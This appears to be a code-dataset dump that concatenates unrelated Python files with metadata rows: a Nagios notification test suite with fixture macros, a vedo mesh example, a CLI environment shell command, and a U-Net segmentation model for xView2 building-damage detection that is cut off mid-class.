'NAGIOS_CONTACTNAME': "root",
'NAGIOS_CONTACTALIAS': "Mr. Big",
'NAGIOS_CONTACTEMAIL': "root@localhost",
'NAGIOS_CONTACTPAGER': "pager@localhost",
'NAGIOS_CONTACTGROUPNAMES': "admins,managers",
# The address fields could be anything...
#'NAGIOS_CONTACTADDRESS0': "",
# Contact Group Macros
'NAGIOS_CONTACTGROUPNAME': "admins",
'NAGIOS_CONTACTGROUPALIAS': "Admins",
'NAGIOS_CONTACTGROUPMEMBERS': "root,luser",
# Summary Macros (NAGIOS_TOTAL*) are not always available
# so they are not included here...
# Notification Macros
'NAGIOS_NOTIFICATIONTYPE': "PROBLEM",
'NAGIOS_NOTIFICATIONRECIPIENTS': "root",
'NAGIOS_NOTIFICATIONISESCALATED': "0",
'NAGIOS_NOTIFICATIONAUTHOR': "",
'NAGIOS_NOTIFICATIONAUTHORNAME': "",
'NAGIOS_NOTIFICATIONAUTHORALIAS': "",
'NAGIOS_NOTIFICATIONCOMMENT': "",
'NAGIOS_NOTIFICATIONNUMBER': "1",
'NAGIOS_HOSTNOTIFICATIONNUMBER': "0",
'NAGIOS_HOSTNOTIFICATIONID': "0",
'NAGIOS_SERVICENOTIFICATIONNUMBER': "1",
'NAGIOS_SERVICENOTIFICATIONID': "409161",
# Date/Time Macros
'NAGIOS_LONGDATETIME': "Sun Dec 6 04:25:32 EST 2009",
'NAGIOS_SHORTDATETIME': "12-06-2009 04:25:33",
'NAGIOS_DATE': "12-06-2009",
'NAGIOS_TIME': "04:25:34",
'NAGIOS_TIMET': "1260091534",
# File Macros:
'NAGIOS_MAINCONFIGFILE': "/path/to/nagios.cfg",
'NAGIOS_STATUSDATAFILE': "/path/to/status.dat",
'NAGIOS_RETENTIONDATAFILE': "/path/to/retention.dat",
'NAGIOS_OBJECTCACHEFILE': "/path/to/objects.cache",
'NAGIOS_TEMPFILE': "/path/to/nagios.tmp",
'NAGIOS_TEMPPATH': "/tmp",
'NAGIOS_LOGFILE': "/path/to/nagios.log",
'NAGIOS_RESOURCEFILE': "/path/to/resource.cfg",
'NAGIOS_COMMANDFILE': "/path/to/nagios.cmd",
# Misc Macros:
'NAGIOS_PROCESSSTARTTIME': "1259966149",
'NAGIOS_EVENTSTARTTIME': "1259966149",
'NAGIOS_ADMINEMAIL': "root@localhost",
'NAGIOS_ADMINPAGER': "pager@localhost",
# These are available but could be anything...
#'NAGIOS_ARG0': "",
#'NAGIOS_USER0': "",
}
ENVIRONMENT_SERVICE = {
# Service Macros
'NAGIOS_SERVICEDESC': "PING",
'NAGIOS_SERVICEDISPLAYNAME': "PING",
'NAGIOS_SERVICESTATE': "CRITICAL",
'NAGIOS_SERVICESTATEID': "2",
'NAGIOS_LASTSERVICESTATE': "CRITICAL",
'NAGIOS_LASTSERVICESTATEID': "2",
'NAGIOS_SERVICESTATETYPE': "HARD",
'NAGIOS_SERVICEATTEMPT': "3",
'NAGIOS_MAXSERVICEATTEMPTS': "3",
'NAGIOS_SERVICEISVOLATILE': "0",
'NAGIOS_SERVICEEVENTID': "56460",
'NAGIOS_LASTSERVICEEVENTID': "56405",
'NAGIOS_SERVICEPROBLEMID': "28201",
'NAGIOS_LASTSERVICEPROBLEMID': "0",
'NAGIOS_SERVICELATENCY': "0.357",
'NAGIOS_SERVICEEXECUTIONTIME': "0.000",
'NAGIOS_SERVICEDURATION': "0d 0h 0m 17s",
'NAGIOS_SERVICEDURATIONSEC': "17",
'NAGIOS_SERVICEDOWNTIME': "0",
'NAGIOS_SERVICEPERCENTCHANGE': "12.37",
'NAGIOS_SERVICEGROUPNAMES': "z_gorup,y_group",
'NAGIOS_LASTSERVICECHECK': "1260146052",
'NAGIOS_LASTSERVICESTATECHANGE': "1260146112",
'NAGIOS_LASTSERVICEOK': "1260146052",
'NAGIOS_LASTSERVICEWARNING': "1260091455",
'NAGIOS_LASTSERVIVECRITICAL': "1260146112",
'NAGIOS_LASTSERVICEUNKNOWN': "1257999616",
'NAGIOS_SERVICEOUTPUT': "PING CRITICAL - Packet loss = 60%, RTA = 0.38 ms",
'NAGIOS_LONGSERVICEOUTPUT': "Long Output\\nWith\\nextra lines",
'NAGIOS_SERVICEPERFDATA': "",
'NAGIOS_SERVICECHECKCOMMAND': "check_freshness",
'NAGIOS_SERVICEACTIONURL': "",
'NAGIOS_SERVICENOTESURL': "",
'NAGIOS_SERVICENOTES': "",
# Service Group Macros
'NAGIOS_SERVICEGROUPNAME': "z_group",
'NAGIOS_SERVICEGROUPALIAS': "Z Group",
'NAGIOS_SERVICEGROUPMEMBERS': "localhost,PING,otherhost,PING",
'NAGIOS_SERVICEGROUPNOTESURL': "",
'NAGIOS_SERVICEGROUPNOTES': "",
}
ENVIRONMENT_SERVICE.update(ENVIRONMENT_HOST)
class MacrosTestCase(unittest.TestCase):
def setUp(self):
self.macros = notify.Macros(ENVIRONMENT_SERVICE)
def testPrefix(self):
for key in self.macros:
self.failIf(key.startswith("NAGIOS_"))
def testNewlines(self):
for key, value in self.macros.iteritems():
if key == "LONGSERVICEOUTPUT":
self.assert_(len(value.splitlines()) > 1)
else:
self.assert_(not value or len(value.splitlines()) == 1)
def testMissing(self):
self.assertRaises(notify.MissingMacro,
lambda: self.macros['DOESNOTEXIST'])
class NotificationTest(unittest.TestCase):
def setUp(self):
self.macros = {
'host': notify.Macros(ENVIRONMENT_HOST),
'service': notify.Macros(ENVIRONMENT_SERVICE)}
self.config = coil.parse(notify.DEFAULT_CONFIG)
def testSubject(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
self.assert_(obj.subject())
def testBody(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
long = obj.body()
self.assert_(long)
self.failIf(re.search('{\w+}', long))
obj.format = "short"
short = obj.body()
self.assert_(short)
self.failIf(re.search('{\w+}', short))
self.assert_(len(short) < len(long))
def testURLs(self):
config = self.config.copy()
config['urls.nagios'] ="https://testURLs/zomg/nagios"
config['urls.graphs'] ="https://testURLs/zomg/graphs"
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], config)
urls = obj.urls()
self.assert_(urls['nagios'].startswith(config['urls.nagios']))
self.assert_(urls['graphs'].startswith(config['urls.graphs']))
| 40.31441 | 102 | 0.603986 |
import re
from twisted.trial import unittest
from nagcat import notify
import coil
ENVIRONMENT_HOST = {
'NAGIOS_HOSTNAME': "localhost",
'NAGIOS_HOSTDISPLAYNAME': "localhost",
'NAGIOS_HOSTALIAS': "localhost",
'NAGIOS_HOSTADDRESS': "127.0.0.1",
'NAGIOS_HOSTSTATE': "UP",
'NAGIOS_HOSTSTATEID': "0",
'NAGIOS_LASTHOSTSTATE': "UP",
'NAGIOS_LASTHOSTSTATEID': "0",
'NAGIOS_HOSTSTATETYPE': "HARD",
'NAGIOS_HOSTATTEMPT': "1",
'NAGIOS_MAXHOSTATTEMPTS': "3",
'NAGIOS_HOSTEVENTID': "0",
'NAGIOS_LASTHOSTEVENTID': "0",
'NAGIOS_HOSTPROBLEMID': "0",
'NAGIOS_LASTHOSTPROBLEMID': "0",
'NAGIOS_HOSTLATENCY': "0.123",
'NAGIOS_HOSTEXECUTIONTIME': "4.012",
'NAGIOS_HOSTDURATION': "35d 15h 31m 49s",
'NAGIOS_HOSTDURATIONSEC': "3079909",
'NAGIOS_HOSTDOWNTIME': "0",
'NAGIOS_HOSTPERCENTCHANGE': "0.0",
'NAGIOS_HOSTGROUPNAMES': "a_group,b_group",
'NAGIOS_LASTHOSTCHECK': "1260009929",
'NAGIOS_LASTHOSTSTATECHANGE': "1256929950",
'NAGIOS_LASTHOSTUP': "1260009939",
'NAGIOS_LASTHOSTDOWN': "0",
'NAGIOS_LASTHOSTUNREACHABLE': "0",
'NAGIOS_HOSTOUTPUT': "PING OK - Packet loss = 0%, RTA = 2.00 ms",
'NAGIOS_LONGHOSTOUTPUT': "",
'NAGIOS_HOSTPERFDATA': "rta=10.778000ms;3000.000000;5000.000000;0.000000 pl=0%;80;100;0",
'NAGIOS_HOSTCHECKCOMMAND': "check_host_alive",
'NAGIOS_HOSTACTIONURL': "",
'NAGIOS_HOSTNOTESURL': "",
'NAGIOS_HOSTNOTES': "",
'NAGIOS_TOTALHOSTSERVICES': "39",
'NAGIOS_TOTALHOSTSERVICESOK': "38",
'NAGIOS_TOTALHOSTSERVICESWARNING': "0",
'NAGIOS_TOTALHOSTSERVICESCRITICAL': "1",
'NAGIOS_TOTALHOSTSERVICESUNKNOWN': "0",
'NAGIOS_HOSTGROUPNAME': "a_group",
'NAGIOS_HOSTGROUPALIAS': "A Group",
'NAGIOS_HOSTGROUPMEMBERS': "localhost",
'NAGIOS_HOSTGROUPNOTES': "",
'NAGIOS_HOSTGROUPNOTESURL': "",
'NAGIOS_HOSTGROUPACTIONURL': "",
'NAGIOS_CONTACTNAME': "root",
'NAGIOS_CONTACTALIAS': "Mr. Big",
'NAGIOS_CONTACTEMAIL': "root@localhost",
'NAGIOS_CONTACTPAGER': "pager@localhost",
'NAGIOS_CONTACTGROUPNAMES': "admins,managers",
'NAGIOS_CONTACTGROUPNAME': "admins",
'NAGIOS_CONTACTGROUPALIAS': "Admins",
'NAGIOS_CONTACTGROUPMEMBERS': "root,luser",
'NAGIOS_NOTIFICATIONTYPE': "PROBLEM",
'NAGIOS_NOTIFICATIONRECIPIENTS': "root",
'NAGIOS_NOTIFICATIONISESCALATED': "0",
'NAGIOS_NOTIFICATIONAUTHOR': "",
'NAGIOS_NOTIFICATIONAUTHORNAME': "",
'NAGIOS_NOTIFICATIONAUTHORALIAS': "",
'NAGIOS_NOTIFICATIONCOMMENT': "",
'NAGIOS_NOTIFICATIONNUMBER': "1",
'NAGIOS_HOSTNOTIFICATIONNUMBER': "0",
'NAGIOS_HOSTNOTIFICATIONID': "0",
'NAGIOS_SERVICENOTIFICATIONNUMBER': "1",
'NAGIOS_SERVICENOTIFICATIONID': "409161",
'NAGIOS_LONGDATETIME': "Sun Dec 6 04:25:32 EST 2009",
'NAGIOS_SHORTDATETIME': "12-06-2009 04:25:33",
'NAGIOS_DATE': "12-06-2009",
'NAGIOS_TIME': "04:25:34",
'NAGIOS_TIMET': "1260091534",
'NAGIOS_MAINCONFIGFILE': "/path/to/nagios.cfg",
'NAGIOS_STATUSDATAFILE': "/path/to/status.dat",
'NAGIOS_RETENTIONDATAFILE': "/path/to/retention.dat",
'NAGIOS_OBJECTCACHEFILE': "/path/to/objects.cache",
'NAGIOS_TEMPFILE': "/path/to/nagios.tmp",
'NAGIOS_TEMPPATH': "/tmp",
'NAGIOS_LOGFILE': "/path/to/nagios.log",
'NAGIOS_RESOURCEFILE': "/path/to/resource.cfg",
'NAGIOS_COMMANDFILE': "/path/to/nagios.cmd",
'NAGIOS_PROCESSSTARTTIME': "1259966149",
'NAGIOS_EVENTSTARTTIME': "1259966149",
'NAGIOS_ADMINEMAIL': "root@localhost",
'NAGIOS_ADMINPAGER': "pager@localhost",
}
ENVIRONMENT_SERVICE = {
'NAGIOS_SERVICEDESC': "PING",
'NAGIOS_SERVICEDISPLAYNAME': "PING",
'NAGIOS_SERVICESTATE': "CRITICAL",
'NAGIOS_SERVICESTATEID': "2",
'NAGIOS_LASTSERVICESTATE': "CRITICAL",
'NAGIOS_LASTSERVICESTATEID': "2",
'NAGIOS_SERVICESTATETYPE': "HARD",
'NAGIOS_SERVICEATTEMPT': "3",
'NAGIOS_MAXSERVICEATTEMPTS': "3",
'NAGIOS_SERVICEISVOLATILE': "0",
'NAGIOS_SERVICEEVENTID': "56460",
'NAGIOS_LASTSERVICEEVENTID': "56405",
'NAGIOS_SERVICEPROBLEMID': "28201",
'NAGIOS_LASTSERVICEPROBLEMID': "0",
'NAGIOS_SERVICELATENCY': "0.357",
'NAGIOS_SERVICEEXECUTIONTIME': "0.000",
'NAGIOS_SERVICEDURATION': "0d 0h 0m 17s",
'NAGIOS_SERVICEDURATIONSEC': "17",
'NAGIOS_SERVICEDOWNTIME': "0",
'NAGIOS_SERVICEPERCENTCHANGE': "12.37",
'NAGIOS_SERVICEGROUPNAMES': "z_gorup,y_group",
'NAGIOS_LASTSERVICECHECK': "1260146052",
'NAGIOS_LASTSERVICESTATECHANGE': "1260146112",
'NAGIOS_LASTSERVICEOK': "1260146052",
'NAGIOS_LASTSERVICEWARNING': "1260091455",
'NAGIOS_LASTSERVIVECRITICAL': "1260146112",
'NAGIOS_LASTSERVICEUNKNOWN': "1257999616",
'NAGIOS_SERVICEOUTPUT': "PING CRITICAL - Packet loss = 60%, RTA = 0.38 ms",
'NAGIOS_LONGSERVICEOUTPUT': "Long Output\\nWith\\nextra lines",
'NAGIOS_SERVICEPERFDATA': "",
'NAGIOS_SERVICECHECKCOMMAND': "check_freshness",
'NAGIOS_SERVICEACTIONURL': "",
'NAGIOS_SERVICENOTESURL': "",
'NAGIOS_SERVICENOTES': "",
'NAGIOS_SERVICEGROUPNAME': "z_group",
'NAGIOS_SERVICEGROUPALIAS': "Z Group",
'NAGIOS_SERVICEGROUPMEMBERS': "localhost,PING,otherhost,PING",
'NAGIOS_SERVICEGROUPNOTESURL': "",
'NAGIOS_SERVICEGROUPNOTES': "",
}
ENVIRONMENT_SERVICE.update(ENVIRONMENT_HOST)
class MacrosTestCase(unittest.TestCase):
def setUp(self):
self.macros = notify.Macros(ENVIRONMENT_SERVICE)
def testPrefix(self):
for key in self.macros:
self.failIf(key.startswith("NAGIOS_"))
def testNewlines(self):
for key, value in self.macros.iteritems():
if key == "LONGSERVICEOUTPUT":
self.assert_(len(value.splitlines()) > 1)
else:
self.assert_(not value or len(value.splitlines()) == 1)
def testMissing(self):
self.assertRaises(notify.MissingMacro,
lambda: self.macros['DOESNOTEXIST'])
class NotificationTest(unittest.TestCase):
def setUp(self):
self.macros = {
'host': notify.Macros(ENVIRONMENT_HOST),
'service': notify.Macros(ENVIRONMENT_SERVICE)}
self.config = coil.parse(notify.DEFAULT_CONFIG)
def testSubject(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
self.assert_(obj.subject())
def testBody(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
long = obj.body()
self.assert_(long)
self.failIf(re.search('{\w+}', long))
obj.format = "short"
short = obj.body()
self.assert_(short)
self.failIf(re.search('{\w+}', short))
self.assert_(len(short) < len(long))
def testURLs(self):
config = self.config.copy()
config['urls.nagios'] ="https://testURLs/zomg/nagios"
config['urls.graphs'] ="https://testURLs/zomg/graphs"
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], config)
urls = obj.urls()
self.assert_(urls['nagios'].startswith(config['urls.nagios']))
self.assert_(urls['graphs'].startswith(config['urls.graphs']))
| true | true |
f72ec7f9188135bc2abd9576d4b4c2d59ae7a487 | 569 | py | Python | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 836 | 2020-06-14T02:38:12.000Z | 2022-03-31T15:39:50.000Z | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 418 | 2020-06-14T10:51:32.000Z | 2022-03-31T23:23:14.000Z | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 136 | 2020-06-14T02:26:41.000Z | 2022-03-31T12:47:18.000Z | """Manually build a mesh from points and faces"""
from vedo import Mesh, printc, show
verts = [(50,50,50), (70,40,50), (50,40,80), (80,70,50)]
faces = [(0,1,2), (2,1,3), (1,0,3)]
# (the first triangle face is formed by vertex 0, 1 and 2)
# Build the polygonal Mesh object:
mesh = Mesh([verts, faces])
mesh.backColor('violet').lineColor('tomato').lineWidth(2)
labs = mesh.labels('id').c('black')
# retrieve them as numpy arrays
printc('points():\n', mesh.points(), c=3)
printc('faces(): \n', mesh.faces(), c=3)
show(mesh, labs, __doc__, viewup='z', axes=1).close()
| 31.611111 | 58 | 0.648506 | from vedo import Mesh, printc, show
verts = [(50,50,50), (70,40,50), (50,40,80), (80,70,50)]
faces = [(0,1,2), (2,1,3), (1,0,3)]
mesh = Mesh([verts, faces])
mesh.backColor('violet').lineColor('tomato').lineWidth(2)
labs = mesh.labels('id').c('black')
printc('points():\n', mesh.points(), c=3)
printc('faces(): \n', mesh.faces(), c=3)
show(mesh, labs, __doc__, viewup='z', axes=1).close()
| true | true |
f72ec8d5be139f6310464dc01e7c0f57e04b86ad | 38 | py | Python | tests/components/statsd/__init__.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | tests/components/statsd/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 31,101 | 2020-03-02T13:00:16.000Z | 2022-03-31T23:57:36.000Z | tests/components/statsd/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Tests for the statsd component."""
| 19 | 37 | 0.684211 | true | true | |
f72eca7ec01c7f98779fd742ed2f63dd47c2895f | 1,623 | py | Python | client/fmcmds/env_shell.py | AlexRogalskiy/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 19 | 2017-09-01T03:42:00.000Z | 2018-01-25T09:53:59.000Z | client/fmcmds/env_shell.py | mrhm-dev/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 34 | 2017-08-30T14:11:16.000Z | 2017-12-16T01:52:44.000Z | client/fmcmds/env_shell.py | AlexRogalskiy/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 4 | 2019-01-20T22:04:59.000Z | 2022-01-09T02:25:35.000Z | import ast
import json
import readline
from cliff.command import Command
import call_server as server
class EnvironmentShell(Command):
def get_parser(self, prog_name):
parser = super(EnvironmentShell, self).get_parser(prog_name)
parser.add_argument(dest='env_name',
help="Environment name")
return parser
def take_action(self, parsed_args):
env_name = parsed_args.env_name
response = server.TakeAction().get_environment(env_name)
if response:
response_json = json.loads(response)
env_output_config = ast.literal_eval(response_json['data']['env_definition'])
type = env_output_config['environment']['app_deployment']['type']
if type == 'local-docker':
print("Shell functionality not available for local deployment target.")
print("You can use docker commands from command-line instead.")
exit()
if response_json['data']['status'] == 'available':
while True:
command_string = raw_input('("exit" to quit, "help" to see commands) cld>')
command_string = command_string.strip()
if command_string == 'exit':
break
print("Running the command %s in the environment..." % command_string)
response = server.TakeAction().run_command(env_name, command_string)
print(response)
else:
print("Environment %s is not in appropriate state." % env_name)
| 37.744186 | 95 | 0.59581 | import ast
import json
import readline
from cliff.command import Command
import call_server as server
class EnvironmentShell(Command):
def get_parser(self, prog_name):
parser = super(EnvironmentShell, self).get_parser(prog_name)
parser.add_argument(dest='env_name',
help="Environment name")
return parser
def take_action(self, parsed_args):
env_name = parsed_args.env_name
response = server.TakeAction().get_environment(env_name)
if response:
response_json = json.loads(response)
env_output_config = ast.literal_eval(response_json['data']['env_definition'])
type = env_output_config['environment']['app_deployment']['type']
if type == 'local-docker':
print("Shell functionality not available for local deployment target.")
print("You can use docker commands from command-line instead.")
exit()
if response_json['data']['status'] == 'available':
while True:
command_string = raw_input('("exit" to quit, "help" to see commands) cld>')
command_string = command_string.strip()
if command_string == 'exit':
break
print("Running the command %s in the environment..." % command_string)
response = server.TakeAction().run_command(env_name, command_string)
print(response)
else:
print("Environment %s is not in appropriate state." % env_name)
| true | true |
f72ecb13aa6024c6caa779e5cb7893e409d32f30 | 10,988 | py | Python | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | from functools import partial
from typing import List, Union, Callable
import torch
from pytorch_toolbelt.modules import ABN, ACT_RELU, ACT_SWISH
from pytorch_toolbelt.modules import encoders as E
from pytorch_toolbelt.modules.decoders import DecoderModule
from pytorch_toolbelt.modules.encoders import EncoderModule
from torch import nn
from torch.nn import functional as F
from .common import disaster_type_classifier, damage_types_classifier
from ..dataset import OUTPUT_MASK_KEY, DISASTER_TYPE_KEY, DISASTER_TYPES, DAMAGE_TYPE_KEY, DAMAGE_TYPES
__all__ = ["UnetV2SegmentationModel"]
class ConvBottleneck(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.seq = nn.Sequential(nn.Conv2d(in_channels, out_channels, 3, padding=1), nn.ReLU(inplace=True))
def forward(self, dec, enc):
x = torch.cat([dec, enc], dim=1)
return self.seq(x)
class UnetDecoderBlock(nn.Module):
def __init__(self, in_channels, middle_channels, out_channels):
super().__init__()
self.layer = nn.Sequential(
nn.Upsample(scale_factor=2), nn.Conv2d(in_channels, out_channels, 3, padding=1), nn.ReLU(inplace=True)
)
def forward(self, x):
return self.layer(x)
class UNetDecoderV2(DecoderModule):
def __init__(
self,
feature_maps: List[int],
decoder_features: List[int],
mask_channels: int,
last_upsample_filters=None,
dropout=0.0,
abn_block=ABN,
):
super().__init__()
if not isinstance(decoder_features, list):
decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]
if last_upsample_filters is None:
last_upsample_filters = decoder_features[0]
self.encoder_features = feature_maps
self.decoder_features = decoder_features
self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])
self.bottlenecks = nn.ModuleList(
[
ConvBottleneck(self.encoder_features[-i - 2] + f, f)
for i, f in enumerate(reversed(self.decoder_features[:]))
]
)
self.output_filters = decoder_features
self.last_upsample = UnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)
self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)
def get_decoder(self, layer):
in_channels = (
self.encoder_features[layer + 1]
if layer + 1 == len(self.decoder_features)
else self.decoder_features[layer + 1]
)
return UnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])
def forward(self, feature_maps):
last_dec_out = feature_maps[-1]
x = last_dec_out
for idx, bottleneck in enumerate(self.bottlenecks):
rev_idx = -(idx + 1)
decoder = self.decoder_stages[rev_idx]
x = decoder(x)
x = bottleneck(x, feature_maps[rev_idx - 1])
x = self.last_upsample(x)
f = self.final(x)
return f
class UnetV2SegmentationModel(nn.Module):
def __init__(
self,
encoder: EncoderModule,
num_classes: int,
disaster_type_classes: int,
damage_type_classes: int,
unet_channels: List[int],
dropout=0.25,
abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,
full_size_mask=True,
):
super().__init__()
self.encoder = encoder
feature_maps = [2 * fm for fm in encoder.output_filters]
self.decoder = UNetDecoderV2(
feature_maps=feature_maps,
decoder_features=unet_channels,
mask_channels=num_classes,
dropout=dropout,
abn_block=abn_block,
)
self.full_size_mask = full_size_mask
if disaster_type_classes is not None:
self.disaster_type_classifier = disaster_type_classifier(
feature_maps[-1], disaster_type_classes, dropout=dropout
)
else:
self.disaster_type_classifier = None
if damage_type_classes is not None:
self.damage_types_classifier = damage_types_classifier(
feature_maps[-1], damage_type_classes, dropout=dropout
)
else:
self.damage_types_classifier = None
def forward(self, x):
batch_size = x.size(0)
pre, post = x[:, 0:3, ...], x[:, 3:6, ...]
if self.training:
x = torch.cat([pre, post], dim=0)
features = self.encoder(x)
features = [torch.cat([f[0:batch_size], f[batch_size : batch_size * 2]], dim=1) for f in features]
else:
pre_features, post_features = self.encoder(pre), self.encoder(post)
features = [torch.cat([pre, post], dim=1) for pre, post in zip(pre_features, post_features)]
# Decode mask
mask = self.decoder(features)
if self.full_size_mask:
mask = F.interpolate(mask, size=x.size()[2:], mode="bilinear", align_corners=False)
output = {OUTPUT_MASK_KEY: mask}
if self.disaster_type_classifier is not None:
disaster_type = self.disaster_type_classifier(features[-1])
output[DISASTER_TYPE_KEY] = disaster_type
if self.damage_types_classifier is not None:
damage_types = self.damage_types_classifier(features[-1])
output[DAMAGE_TYPE_KEY] = damage_types
return output
def efficientb3_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.EfficientNetB3Encoder(pretrained=pretrained,
layers=[0, 1, 2, 4, 6],
abn_params={"activation": ACT_RELU})
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def densenet121_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def densenet169_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.DenseNet169Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[128, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet18_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet18Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet34_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet34Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[96, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 384],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def seresnext50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def seresnext101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.SEResNeXt101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[128, 128, 256, 384],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
| 38.554386 | 117 | 0.650983 | from functools import partial
from typing import List, Union, Callable
import torch
from pytorch_toolbelt.modules import ABN, ACT_RELU, ACT_SWISH
from pytorch_toolbelt.modules import encoders as E
from pytorch_toolbelt.modules.decoders import DecoderModule
from pytorch_toolbelt.modules.encoders import EncoderModule
from torch import nn
from torch.nn import functional as F
from .common import disaster_type_classifier, damage_types_classifier
from ..dataset import OUTPUT_MASK_KEY, DISASTER_TYPE_KEY, DISASTER_TYPES, DAMAGE_TYPE_KEY, DAMAGE_TYPES
__all__ = ["UnetV2SegmentationModel"]
class ConvBottleneck(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.seq = nn.Sequential(nn.Conv2d(in_channels, out_channels, 3, padding=1), nn.ReLU(inplace=True))
def forward(self, dec, enc):
x = torch.cat([dec, enc], dim=1)
return self.seq(x)
class UnetDecoderBlock(nn.Module):
